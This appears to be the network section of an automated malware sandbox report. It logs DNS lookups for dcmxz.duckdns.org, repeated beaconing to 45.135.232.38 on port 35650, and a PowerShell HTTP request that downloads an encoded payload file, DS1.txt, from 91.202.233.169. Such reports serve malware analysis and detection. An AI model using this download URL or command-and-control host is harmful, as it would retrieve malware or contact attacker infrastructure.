                                    Sep 26, 2024 10:58:03.337136030 CEST4434971915.235.85.194192.168.2.5
                                    Sep 26, 2024 10:58:03.378120899 CEST49719443192.168.2.515.235.85.194
                                    Sep 26, 2024 10:58:03.467477083 CEST49719443192.168.2.515.235.85.194
                                    Sep 26, 2024 10:58:03.467509985 CEST4434971915.235.85.194192.168.2.5
                                    Sep 26, 2024 10:58:03.571913958 CEST4434971915.235.85.194192.168.2.5
                                    Sep 26, 2024 10:58:03.571990013 CEST4434971915.235.85.194192.168.2.5
                                    Sep 26, 2024 10:58:03.572088957 CEST4434971915.235.85.194192.168.2.5
                                    Sep 26, 2024 10:58:03.572110891 CEST49719443192.168.2.515.235.85.194
                                    Sep 26, 2024 10:58:03.572153091 CEST4434971915.235.85.194192.168.2.5
                                    Sep 26, 2024 10:58:03.572164059 CEST49719443192.168.2.515.235.85.194
                                    Sep 26, 2024 10:58:03.572621107 CEST4434971915.235.85.194192.168.2.5
                                    Sep 26, 2024 10:58:03.572710991 CEST4434971915.235.85.194192.168.2.5
                                    Sep 26, 2024 10:58:03.572724104 CEST49719443192.168.2.515.235.85.194
                                    Sep 26, 2024 10:58:03.572734118 CEST4434971915.235.85.194192.168.2.5
                                    Sep 26, 2024 10:58:03.572845936 CEST49719443192.168.2.515.235.85.194
                                    Sep 26, 2024 10:58:03.573226929 CEST4434971915.235.85.194192.168.2.5
                                    Sep 26, 2024 10:58:03.573286057 CEST4434971915.235.85.194192.168.2.5
                                    Sep 26, 2024 10:58:03.573309898 CEST4434971915.235.85.194192.168.2.5
                                    Sep 26, 2024 10:58:03.573326111 CEST49719443192.168.2.515.235.85.194
                                    Sep 26, 2024 10:58:03.573333979 CEST4434971915.235.85.194192.168.2.5
                                    Sep 26, 2024 10:58:03.573378086 CEST49719443192.168.2.515.235.85.194
                                    Sep 26, 2024 10:58:03.574042082 CEST4434971915.235.85.194192.168.2.5
                                    Sep 26, 2024 10:58:03.574088097 CEST4434971915.235.85.194192.168.2.5
                                    Sep 26, 2024 10:58:03.574167967 CEST4434971915.235.85.194192.168.2.5
                                    Sep 26, 2024 10:58:03.574187994 CEST49719443192.168.2.515.235.85.194
                                    Sep 26, 2024 10:58:03.574196100 CEST4434971915.235.85.194192.168.2.5
                                    Sep 26, 2024 10:58:03.574400902 CEST49719443192.168.2.515.235.85.194
                                    Sep 26, 2024 10:58:03.574865103 CEST4434971915.235.85.194192.168.2.5
                                    Sep 26, 2024 10:58:03.574913025 CEST4434971915.235.85.194192.168.2.5
                                    Sep 26, 2024 10:58:03.574969053 CEST4434971915.235.85.194192.168.2.5
                                    Sep 26, 2024 10:58:03.574979067 CEST49719443192.168.2.515.235.85.194
                                    Sep 26, 2024 10:58:03.574986935 CEST4434971915.235.85.194192.168.2.5
                                    Sep 26, 2024 10:58:03.575076103 CEST49719443192.168.2.515.235.85.194
                                    Sep 26, 2024 10:58:03.575686932 CEST4434971915.235.85.194192.168.2.5
                                    Sep 26, 2024 10:58:03.575754881 CEST4434971915.235.85.194192.168.2.5
                                    Sep 26, 2024 10:58:03.575799942 CEST49719443192.168.2.515.235.85.194
                                    Sep 26, 2024 10:58:03.575809002 CEST4434971915.235.85.194192.168.2.5
                                    Sep 26, 2024 10:58:03.581489086 CEST4434971915.235.85.194192.168.2.5
                                    Sep 26, 2024 10:58:03.581552982 CEST49719443192.168.2.515.235.85.194
                                    Sep 26, 2024 10:58:03.660598993 CEST4434971915.235.85.194192.168.2.5
                                    Sep 26, 2024 10:58:03.660618067 CEST4434971915.235.85.194192.168.2.5
                                    Sep 26, 2024 10:58:03.660695076 CEST49719443192.168.2.515.235.85.194
                                    Sep 26, 2024 10:58:03.660727024 CEST4434971915.235.85.194192.168.2.5
                                    Sep 26, 2024 10:58:03.660758972 CEST4434971915.235.85.194192.168.2.5
                                    Sep 26, 2024 10:58:03.660789967 CEST4434971915.235.85.194192.168.2.5
                                    Sep 26, 2024 10:58:03.660804987 CEST49719443192.168.2.515.235.85.194
                                    Sep 26, 2024 10:58:03.660815001 CEST4434971915.235.85.194192.168.2.5
                                    Sep 26, 2024 10:58:03.660829067 CEST49719443192.168.2.515.235.85.194
                                    Sep 26, 2024 10:58:03.660866022 CEST4434971915.235.85.194192.168.2.5
                                    Sep 26, 2024 10:58:03.660875082 CEST4434971915.235.85.194192.168.2.5
                                    Sep 26, 2024 10:58:03.660896063 CEST4434971915.235.85.194192.168.2.5
                                    Sep 26, 2024 10:58:03.660912991 CEST49719443192.168.2.515.235.85.194
                                    Sep 26, 2024 10:58:03.660922050 CEST4434971915.235.85.194192.168.2.5
                                    Sep 26, 2024 10:58:03.660939932 CEST49719443192.168.2.515.235.85.194
                                    Sep 26, 2024 10:58:03.661705971 CEST4434971915.235.85.194192.168.2.5
                                    Sep 26, 2024 10:58:03.661714077 CEST4434971915.235.85.194192.168.2.5
                                    Sep 26, 2024 10:58:03.661761999 CEST49719443192.168.2.515.235.85.194
                                    Sep 26, 2024 10:58:03.661772966 CEST4434971915.235.85.194192.168.2.5
                                    Sep 26, 2024 10:58:03.661866903 CEST4434971915.235.85.194192.168.2.5
                                    Sep 26, 2024 10:58:03.661900043 CEST4434971915.235.85.194192.168.2.5
                                    Sep 26, 2024 10:58:03.661905050 CEST4434971915.235.85.194192.168.2.5
                                    Sep 26, 2024 10:58:03.661916018 CEST49719443192.168.2.515.235.85.194
                                    Sep 26, 2024 10:58:03.661922932 CEST4434971915.235.85.194192.168.2.5
                                    Sep 26, 2024 10:58:03.661946058 CEST49719443192.168.2.515.235.85.194
                                    Sep 26, 2024 10:58:03.661973953 CEST49719443192.168.2.515.235.85.194
                                    Sep 26, 2024 10:58:03.662614107 CEST4434971915.235.85.194192.168.2.5
                                    Sep 26, 2024 10:58:03.662755013 CEST4434971915.235.85.194192.168.2.5
                                    Sep 26, 2024 10:58:03.662787914 CEST4434971915.235.85.194192.168.2.5
                                    Sep 26, 2024 10:58:03.662823915 CEST49719443192.168.2.515.235.85.194
                                    Sep 26, 2024 10:58:03.662832975 CEST4434971915.235.85.194192.168.2.5
                                    Sep 26, 2024 10:58:03.662863016 CEST49719443192.168.2.515.235.85.194
                                    Sep 26, 2024 10:58:03.664195061 CEST4972180192.168.2.591.202.233.169
                                    Sep 26, 2024 10:58:03.669075966 CEST804972191.202.233.169192.168.2.5
                                    Sep 26, 2024 10:58:03.669311047 CEST4972180192.168.2.591.202.233.169
                                    Sep 26, 2024 10:58:03.669411898 CEST4972180192.168.2.591.202.233.169
                                    Sep 26, 2024 10:58:03.674422979 CEST804972191.202.233.169192.168.2.5
                                    Sep 26, 2024 10:58:03.706238985 CEST49719443192.168.2.515.235.85.194
                                    Sep 26, 2024 10:58:04.406827927 CEST804972191.202.233.169192.168.2.5
                                    Sep 26, 2024 10:58:04.406929970 CEST804972191.202.233.169192.168.2.5
                                    Sep 26, 2024 10:58:04.406970978 CEST4972180192.168.2.591.202.233.169
                                    Sep 26, 2024 10:58:04.406980991 CEST804972191.202.233.169192.168.2.5
                                    Sep 26, 2024 10:58:04.407016039 CEST804972191.202.233.169192.168.2.5
                                    Sep 26, 2024 10:58:04.407057047 CEST4972180192.168.2.591.202.233.169
                                    Sep 26, 2024 10:58:04.407068014 CEST804972191.202.233.169192.168.2.5
                                    Sep 26, 2024 10:58:04.407118082 CEST804972191.202.233.169192.168.2.5
                                    Sep 26, 2024 10:58:04.407151937 CEST804972191.202.233.169192.168.2.5
                                    Sep 26, 2024 10:58:04.407154083 CEST4972180192.168.2.591.202.233.169
                                    Sep 26, 2024 10:58:04.407186031 CEST804972191.202.233.169192.168.2.5
                                    Sep 26, 2024 10:58:04.407217979 CEST804972191.202.233.169192.168.2.5
                                    Sep 26, 2024 10:58:04.407224894 CEST4972180192.168.2.591.202.233.169
                                    Sep 26, 2024 10:58:04.407253027 CEST804972191.202.233.169192.168.2.5
                                    Sep 26, 2024 10:58:04.407289028 CEST4972180192.168.2.591.202.233.169
                                    Sep 26, 2024 10:58:04.412096024 CEST804972191.202.233.169192.168.2.5
                                    Sep 26, 2024 10:58:04.412127018 CEST804972191.202.233.169192.168.2.5
                                    Sep 26, 2024 10:58:04.412172079 CEST4972180192.168.2.591.202.233.169
                                    Sep 26, 2024 10:58:04.529109001 CEST804972191.202.233.169192.168.2.5
                                    Sep 26, 2024 10:58:04.529167891 CEST804972191.202.233.169192.168.2.5
                                    Sep 26, 2024 10:58:04.529200077 CEST804972191.202.233.169192.168.2.5
                                    Sep 26, 2024 10:58:04.529227018 CEST4972180192.168.2.591.202.233.169
                                    Sep 26, 2024 10:58:04.529294968 CEST804972191.202.233.169192.168.2.5
                                    Sep 26, 2024 10:58:04.529330969 CEST804972191.202.233.169192.168.2.5
                                    Sep 26, 2024 10:58:04.529340982 CEST4972180192.168.2.591.202.233.169
                                    Sep 26, 2024 10:58:04.529364109 CEST804972191.202.233.169192.168.2.5
                                    Sep 26, 2024 10:58:04.529400110 CEST4972180192.168.2.591.202.233.169
                                    Sep 26, 2024 10:58:04.529721975 CEST804972191.202.233.169192.168.2.5
                                    Sep 26, 2024 10:58:04.529772997 CEST804972191.202.233.169192.168.2.5
                                    Sep 26, 2024 10:58:04.529805899 CEST804972191.202.233.169192.168.2.5
                                    Sep 26, 2024 10:58:04.529818058 CEST4972180192.168.2.591.202.233.169
                                    Sep 26, 2024 10:58:04.529844046 CEST804972191.202.233.169192.168.2.5
                                    Sep 26, 2024 10:58:04.529887915 CEST4972180192.168.2.591.202.233.169
                                    Sep 26, 2024 10:58:04.529896021 CEST804972191.202.233.169192.168.2.5
                                    Sep 26, 2024 10:58:04.530555010 CEST804972191.202.233.169192.168.2.5
                                    Sep 26, 2024 10:58:04.530600071 CEST4972180192.168.2.591.202.233.169
                                    Sep 26, 2024 10:58:04.530603886 CEST804972191.202.233.169192.168.2.5
                                    Sep 26, 2024 10:58:04.530638933 CEST804972191.202.233.169192.168.2.5
                                    Sep 26, 2024 10:58:04.530672073 CEST804972191.202.233.169192.168.2.5
                                    Sep 26, 2024 10:58:04.530683994 CEST4972180192.168.2.591.202.233.169
                                    Sep 26, 2024 10:58:04.530705929 CEST804972191.202.233.169192.168.2.5
                                    Sep 26, 2024 10:58:04.530749083 CEST4972180192.168.2.591.202.233.169
                                    Sep 26, 2024 10:58:04.531461000 CEST804972191.202.233.169192.168.2.5
                                    Sep 26, 2024 10:58:04.531493902 CEST804972191.202.233.169192.168.2.5
                                    Sep 26, 2024 10:58:04.531538010 CEST4972180192.168.2.591.202.233.169
                                    Sep 26, 2024 10:58:04.531544924 CEST804972191.202.233.169192.168.2.5
                                    Sep 26, 2024 10:58:04.531578064 CEST804972191.202.233.169192.168.2.5
                                    Sep 26, 2024 10:58:04.531610012 CEST804972191.202.233.169192.168.2.5
                                    Sep 26, 2024 10:58:04.531621933 CEST4972180192.168.2.591.202.233.169
                                    Sep 26, 2024 10:58:04.532294989 CEST804972191.202.233.169192.168.2.5
                                    Sep 26, 2024 10:58:04.532340050 CEST4972180192.168.2.591.202.233.169
                                    Sep 26, 2024 10:58:04.620131016 CEST804972191.202.233.169192.168.2.5
                                    Sep 26, 2024 10:58:04.620151997 CEST804972191.202.233.169192.168.2.5
                                    Sep 26, 2024 10:58:04.620170116 CEST804972191.202.233.169192.168.2.5
                                    Sep 26, 2024 10:58:04.620187044 CEST804972191.202.233.169192.168.2.5
                                    Sep 26, 2024 10:58:04.620199919 CEST804972191.202.233.169192.168.2.5
                                    Sep 26, 2024 10:58:04.620202065 CEST4972180192.168.2.591.202.233.169
                                    Sep 26, 2024 10:58:04.620237112 CEST4972180192.168.2.591.202.233.169
                                    Sep 26, 2024 10:58:04.651724100 CEST804972191.202.233.169192.168.2.5
                                    Sep 26, 2024 10:58:04.651786089 CEST804972191.202.233.169192.168.2.5
                                    Sep 26, 2024 10:58:04.651799917 CEST4972180192.168.2.591.202.233.169
                                    Sep 26, 2024 10:58:04.651856899 CEST804972191.202.233.169192.168.2.5
                                    Sep 26, 2024 10:58:04.651891947 CEST804972191.202.233.169192.168.2.5
                                    Sep 26, 2024 10:58:04.651905060 CEST4972180192.168.2.591.202.233.169
                                    Sep 26, 2024 10:58:04.651926994 CEST804972191.202.233.169192.168.2.5
                                    Sep 26, 2024 10:58:04.651983023 CEST4972180192.168.2.591.202.233.169
                                    Sep 26, 2024 10:58:04.651999950 CEST804972191.202.233.169192.168.2.5
                                    Sep 26, 2024 10:58:04.652065992 CEST804972191.202.233.169192.168.2.5
                                    Sep 26, 2024 10:58:04.652100086 CEST804972191.202.233.169192.168.2.5
                                    Sep 26, 2024 10:58:04.652107954 CEST4972180192.168.2.591.202.233.169
                                    Sep 26, 2024 10:58:04.652134895 CEST804972191.202.233.169192.168.2.5
                                    Sep 26, 2024 10:58:04.652168036 CEST804972191.202.233.169192.168.2.5
                                    Sep 26, 2024 10:58:04.652175903 CEST4972180192.168.2.591.202.233.169
                                    Sep 26, 2024 10:58:04.652632952 CEST804972191.202.233.169192.168.2.5
                                    Sep 26, 2024 10:58:04.652684927 CEST804972191.202.233.169192.168.2.5
                                    Sep 26, 2024 10:58:04.652688026 CEST4972180192.168.2.591.202.233.169
                                    Sep 26, 2024 10:58:04.652718067 CEST804972191.202.233.169192.168.2.5
                                    Sep 26, 2024 10:58:04.652756929 CEST4972180192.168.2.591.202.233.169
                                    Sep 26, 2024 10:58:04.652800083 CEST804972191.202.233.169192.168.2.5
                                    Sep 26, 2024 10:58:04.652832031 CEST804972191.202.233.169192.168.2.5
                                    Sep 26, 2024 10:58:04.652864933 CEST804972191.202.233.169192.168.2.5
                                    Sep 26, 2024 10:58:04.652870893 CEST4972180192.168.2.591.202.233.169
                                    Sep 26, 2024 10:58:04.652899981 CEST804972191.202.233.169192.168.2.5
                                    Sep 26, 2024 10:58:04.652940989 CEST4972180192.168.2.591.202.233.169
                                    Sep 26, 2024 10:58:04.653522968 CEST804972191.202.233.169192.168.2.5
                                    Sep 26, 2024 10:58:04.653557062 CEST804972191.202.233.169192.168.2.5
                                    Sep 26, 2024 10:58:04.653599977 CEST4972180192.168.2.591.202.233.169
                                    Sep 26, 2024 10:58:05.091562986 CEST4972180192.168.2.591.202.233.169
                                    Sep 26, 2024 10:58:05.091957092 CEST49719443192.168.2.515.235.85.194
                                    Sep 26, 2024 10:58:10.753695965 CEST4971035650192.168.2.545.135.232.38
                                    Sep 26, 2024 10:58:10.758760929 CEST356504971045.135.232.38192.168.2.5
                                    Sep 26, 2024 10:58:10.758868933 CEST4971035650192.168.2.545.135.232.38
                                    Sep 26, 2024 10:58:10.763715982 CEST356504971045.135.232.38192.168.2.5
                                    Sep 26, 2024 10:58:10.803675890 CEST356504971045.135.232.38192.168.2.5
                                    Sep 26, 2024 10:58:10.878137112 CEST4971035650192.168.2.545.135.232.38
                                    Sep 26, 2024 10:58:10.970331907 CEST356504971045.135.232.38192.168.2.5
                                    Sep 26, 2024 10:58:11.081254959 CEST4971035650192.168.2.545.135.232.38
                                    Sep 26, 2024 10:58:11.095257998 CEST356504971045.135.232.38192.168.2.5
                                    Sep 26, 2024 10:58:11.267667055 CEST356504971045.135.232.38192.168.2.5
                                    Sep 26, 2024 10:58:11.267779112 CEST4971035650192.168.2.545.135.232.38
                                    Sep 26, 2024 10:58:11.269254923 CEST4971035650192.168.2.545.135.232.38
                                    Sep 26, 2024 10:58:11.274095058 CEST356504971045.135.232.38192.168.2.5
                                    Sep 26, 2024 10:58:11.274178982 CEST4971035650192.168.2.545.135.232.38
                                    Sep 26, 2024 10:58:11.279161930 CEST356504971045.135.232.38192.168.2.5
                                    Sep 26, 2024 10:58:23.678879976 CEST4971035650192.168.2.545.135.232.38
                                    Sep 26, 2024 10:58:23.683937073 CEST356504971045.135.232.38192.168.2.5
                                    Sep 26, 2024 10:58:23.684022903 CEST4971035650192.168.2.545.135.232.38
                                    Sep 26, 2024 10:58:23.688993931 CEST356504971045.135.232.38192.168.2.5
                                    Sep 26, 2024 10:58:24.126996994 CEST356504971045.135.232.38192.168.2.5
                                    Sep 26, 2024 10:58:24.237782001 CEST356504971045.135.232.38192.168.2.5
                                    Sep 26, 2024 10:58:24.237899065 CEST4971035650192.168.2.545.135.232.38
                                    Sep 26, 2024 10:58:24.239316940 CEST4971035650192.168.2.545.135.232.38
                                    Sep 26, 2024 10:58:24.245008945 CEST356504971045.135.232.38192.168.2.5
                                    Sep 26, 2024 10:58:24.245099068 CEST4971035650192.168.2.545.135.232.38
                                    Sep 26, 2024 10:58:24.250251055 CEST356504971045.135.232.38192.168.2.5
                                    Sep 26, 2024 10:58:36.597508907 CEST4971035650192.168.2.545.135.232.38
                                    Sep 26, 2024 10:58:36.602344036 CEST356504971045.135.232.38192.168.2.5
                                    Sep 26, 2024 10:58:36.602416992 CEST4971035650192.168.2.545.135.232.38
                                    Sep 26, 2024 10:58:36.607243061 CEST356504971045.135.232.38192.168.2.5
                                    Sep 26, 2024 10:58:36.987849951 CEST356504971045.135.232.38192.168.2.5
                                    Sep 26, 2024 10:58:37.081249952 CEST4971035650192.168.2.545.135.232.38
                                    Sep 26, 2024 10:58:37.158428907 CEST356504971045.135.232.38192.168.2.5
                                    Sep 26, 2024 10:58:37.160594940 CEST4971035650192.168.2.545.135.232.38
                                    Sep 26, 2024 10:58:37.165360928 CEST356504971045.135.232.38192.168.2.5
                                    Sep 26, 2024 10:58:37.165426970 CEST4971035650192.168.2.545.135.232.38
                                    Sep 26, 2024 10:58:37.170270920 CEST356504971045.135.232.38192.168.2.5
                                    Sep 26, 2024 10:58:40.815490961 CEST356504971045.135.232.38192.168.2.5
                                    Sep 26, 2024 10:58:40.878158092 CEST4971035650192.168.2.545.135.232.38
                                    Sep 26, 2024 10:58:40.986665010 CEST356504971045.135.232.38192.168.2.5
                                    Sep 26, 2024 10:58:41.081234932 CEST4971035650192.168.2.545.135.232.38
                                    Sep 26, 2024 10:58:49.519232035 CEST4971035650192.168.2.545.135.232.38
                                    Sep 26, 2024 10:58:49.524168968 CEST356504971045.135.232.38192.168.2.5
                                    Sep 26, 2024 10:58:49.525865078 CEST4971035650192.168.2.545.135.232.38
                                    Sep 26, 2024 10:58:49.530714989 CEST356504971045.135.232.38192.168.2.5
                                    Sep 26, 2024 10:58:49.906706095 CEST356504971045.135.232.38192.168.2.5
                                    Sep 26, 2024 10:58:49.956255913 CEST4971035650192.168.2.545.135.232.38
                                    Sep 26, 2024 10:58:50.096574068 CEST356504971045.135.232.38192.168.2.5
                                    Sep 26, 2024 10:58:50.099368095 CEST4971035650192.168.2.545.135.232.38
                                    Sep 26, 2024 10:58:50.104219913 CEST356504971045.135.232.38192.168.2.5
                                    Sep 26, 2024 10:58:50.105870008 CEST4971035650192.168.2.545.135.232.38
                                    Sep 26, 2024 10:58:50.110666037 CEST356504971045.135.232.38192.168.2.5
                                    Sep 26, 2024 10:59:02.545100927 CEST4971035650192.168.2.545.135.232.38
                                    Sep 26, 2024 10:59:02.550035000 CEST356504971045.135.232.38192.168.2.5
                                    Sep 26, 2024 10:59:02.550096035 CEST4971035650192.168.2.545.135.232.38
                                    Sep 26, 2024 10:59:02.554951906 CEST356504971045.135.232.38192.168.2.5
                                    Sep 26, 2024 10:59:02.930661917 CEST356504971045.135.232.38192.168.2.5
                                    Sep 26, 2024 10:59:03.018763065 CEST4971035650192.168.2.545.135.232.38
                                    Sep 26, 2024 10:59:03.096777916 CEST356504971045.135.232.38192.168.2.5
                                    Sep 26, 2024 10:59:03.098696947 CEST4971035650192.168.2.545.135.232.38
                                    Sep 26, 2024 10:59:03.103508949 CEST356504971045.135.232.38192.168.2.5
                                    Sep 26, 2024 10:59:03.103570938 CEST4971035650192.168.2.545.135.232.38
                                    Sep 26, 2024 10:59:03.108462095 CEST356504971045.135.232.38192.168.2.5
                                    Sep 26, 2024 10:59:10.806092024 CEST356504971045.135.232.38192.168.2.5
                                    Sep 26, 2024 10:59:10.846882105 CEST4971035650192.168.2.545.135.232.38
                                    Sep 26, 2024 10:59:10.971839905 CEST356504971045.135.232.38192.168.2.5
                                    Sep 26, 2024 10:59:11.018744946 CEST4971035650192.168.2.545.135.232.38
                                    Sep 26, 2024 10:59:15.394311905 CEST4971035650192.168.2.545.135.232.38
                                    Sep 26, 2024 10:59:15.399131060 CEST356504971045.135.232.38192.168.2.5
                                    Sep 26, 2024 10:59:15.399207115 CEST4971035650192.168.2.545.135.232.38
                                    Sep 26, 2024 10:59:15.404181004 CEST356504971045.135.232.38192.168.2.5
                                    Sep 26, 2024 10:59:15.780108929 CEST356504971045.135.232.38192.168.2.5
                                    Sep 26, 2024 10:59:15.831278086 CEST4971035650192.168.2.545.135.232.38
                                    Sep 26, 2024 10:59:15.956537962 CEST356504971045.135.232.38192.168.2.5
                                    Sep 26, 2024 10:59:15.958694935 CEST4971035650192.168.2.545.135.232.38
                                    Sep 26, 2024 10:59:15.964071989 CEST356504971045.135.232.38192.168.2.5
                                    Sep 26, 2024 10:59:15.964272976 CEST4971035650192.168.2.545.135.232.38
                                    Sep 26, 2024 10:59:15.969748020 CEST356504971045.135.232.38192.168.2.5
                                    Sep 26, 2024 10:59:28.316004992 CEST4971035650192.168.2.545.135.232.38
                                    Sep 26, 2024 10:59:28.320956945 CEST356504971045.135.232.38192.168.2.5
                                    Sep 26, 2024 10:59:28.321182966 CEST4971035650192.168.2.545.135.232.38
                                    Sep 26, 2024 10:59:28.326164007 CEST356504971045.135.232.38192.168.2.5
                                    Sep 26, 2024 10:59:28.702270985 CEST356504971045.135.232.38192.168.2.5
                                    Sep 26, 2024 10:59:28.753181934 CEST4971035650192.168.2.545.135.232.38
                                    Sep 26, 2024 10:59:28.878516912 CEST356504971045.135.232.38192.168.2.5
                                    Sep 26, 2024 10:59:28.880593061 CEST4971035650192.168.2.545.135.232.38
                                    Sep 26, 2024 10:59:28.885377884 CEST356504971045.135.232.38192.168.2.5
                                    Sep 26, 2024 10:59:28.885519981 CEST4971035650192.168.2.545.135.232.38
                                    Sep 26, 2024 10:59:28.890326023 CEST356504971045.135.232.38192.168.2.5
                                    Sep 26, 2024 10:59:40.803240061 CEST356504971045.135.232.38192.168.2.5
                                    Sep 26, 2024 10:59:40.846905947 CEST4971035650192.168.2.545.135.232.38
                                    Sep 26, 2024 10:59:40.973139048 CEST356504971045.135.232.38192.168.2.5
                                    Sep 26, 2024 10:59:41.018781900 CEST4971035650192.168.2.545.135.232.38
                                    Sep 26, 2024 10:59:41.238261938 CEST4971035650192.168.2.545.135.232.38
                                    Sep 26, 2024 10:59:41.243068933 CEST356504971045.135.232.38192.168.2.5
                                    Sep 26, 2024 10:59:41.243180037 CEST4971035650192.168.2.545.135.232.38
                                    Sep 26, 2024 10:59:41.248019934 CEST356504971045.135.232.38192.168.2.5
                                    Sep 26, 2024 10:59:41.623162031 CEST356504971045.135.232.38192.168.2.5
                                    Sep 26, 2024 10:59:41.675071955 CEST4971035650192.168.2.545.135.232.38
                                    Sep 26, 2024 10:59:41.800390959 CEST356504971045.135.232.38192.168.2.5
                                    Sep 26, 2024 10:59:41.804780960 CEST4971035650192.168.2.545.135.232.38
                                    Sep 26, 2024 10:59:41.809657097 CEST356504971045.135.232.38192.168.2.5
                                    Sep 26, 2024 10:59:41.809727907 CEST4971035650192.168.2.545.135.232.38
                                    Sep 26, 2024 10:59:41.814546108 CEST356504971045.135.232.38192.168.2.5
                                    TimestampSource PortDest PortSource IPDest IP
                                    Sep 26, 2024 10:57:00.552860022 CEST4990153192.168.2.51.1.1.1
                                    Sep 26, 2024 10:57:00.825592041 CEST53499011.1.1.1192.168.2.5
                                    Sep 26, 2024 10:57:06.152964115 CEST5912053192.168.2.51.1.1.1
                                    Sep 26, 2024 10:57:07.154015064 CEST5912053192.168.2.51.1.1.1
                                    Sep 26, 2024 10:57:08.172272921 CEST5912053192.168.2.51.1.1.1
                                    Sep 26, 2024 10:57:10.162242889 CEST53591201.1.1.1192.168.2.5
                                    Sep 26, 2024 10:57:10.162262917 CEST53591201.1.1.1192.168.2.5
                                    Sep 26, 2024 10:57:10.162301064 CEST53591201.1.1.1192.168.2.5
                                    Sep 26, 2024 10:57:15.176388025 CEST5187653192.168.2.51.1.1.1
                                    Sep 26, 2024 10:57:15.824561119 CEST53518761.1.1.1192.168.2.5
                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Sep 26, 2024 10:57:00.552860022 CEST192.168.2.51.1.1.10x4f92Standard query (0)www.informacionoportuna.comA (IP address)IN (0x0001)false
                                    Sep 26, 2024 10:57:06.152964115 CEST192.168.2.51.1.1.10x4c3cStandard query (0)dcmxz.duckdns.orgA (IP address)IN (0x0001)false
                                    Sep 26, 2024 10:57:07.154015064 CEST192.168.2.51.1.1.10x4c3cStandard query (0)dcmxz.duckdns.orgA (IP address)IN (0x0001)false
                                    Sep 26, 2024 10:57:08.172272921 CEST192.168.2.51.1.1.10x4c3cStandard query (0)dcmxz.duckdns.orgA (IP address)IN (0x0001)false
                                    Sep 26, 2024 10:57:15.176388025 CEST192.168.2.51.1.1.10xd90eStandard query (0)dcmxz.duckdns.orgA (IP address)IN (0x0001)false
                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Sep 26, 2024 10:57:00.825592041 CEST1.1.1.1192.168.2.50x4f92No error (0)www.informacionoportuna.cominformacionoportuna.comCNAME (Canonical name)IN (0x0001)false
                                    Sep 26, 2024 10:57:00.825592041 CEST1.1.1.1192.168.2.50x4f92No error (0)informacionoportuna.com15.235.85.194A (IP address)IN (0x0001)false
                                    Sep 26, 2024 10:57:10.162242889 CEST1.1.1.1192.168.2.50x4c3cServer failure (2)dcmxz.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                    Sep 26, 2024 10:57:10.162262917 CEST1.1.1.1192.168.2.50x4c3cServer failure (2)dcmxz.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                    Sep 26, 2024 10:57:10.162301064 CEST1.1.1.1192.168.2.50x4c3cServer failure (2)dcmxz.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                    Sep 26, 2024 10:57:14.460047960 CEST1.1.1.1192.168.2.50x3462No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                    Sep 26, 2024 10:57:14.460047960 CEST1.1.1.1192.168.2.50x3462No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                    Sep 26, 2024 10:57:15.824561119 CEST1.1.1.1192.168.2.50xd90eNo error (0)dcmxz.duckdns.org45.135.232.38A (IP address)IN (0x0001)false
                                    Sep 26, 2024 10:58:19.834306955 CEST1.1.1.1192.168.2.50x8358No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                    Sep 26, 2024 10:58:19.834306955 CEST1.1.1.1192.168.2.50x8358No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                    • www.informacionoportuna.com
                                    • 91.202.233.169
                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.54970691.202.233.169806644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    TimestampBytes transferredDirectionData
                                    Sep 26, 2024 10:57:02.479974031 CEST89OUTGET /Tak/Reg/Marz/ENVS/DS1.txt HTTP/1.1
                                    Host: 91.202.233.169
                                    Connection: Keep-Alive
                                    Sep 26, 2024 10:57:03.208159924 CEST1236INHTTP/1.1 200 OK
                                    Server: nginx/1.20.2
                                    Date: Thu, 26 Sep 2024 08:57:03 GMT
                                    Content-Type: text/plain
                                    Content-Length: 64856
                                    Connection: keep-alive
                                    Last-Modified: Mon, 16 Sep 2024 11:16:55 GMT
                                    ETag: "fd58-6223ab5def7c0"
                                    Accept-Ranges: bytes
                                    Vary: Accept-Encoding
                                    Data Raw: 3d 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED]
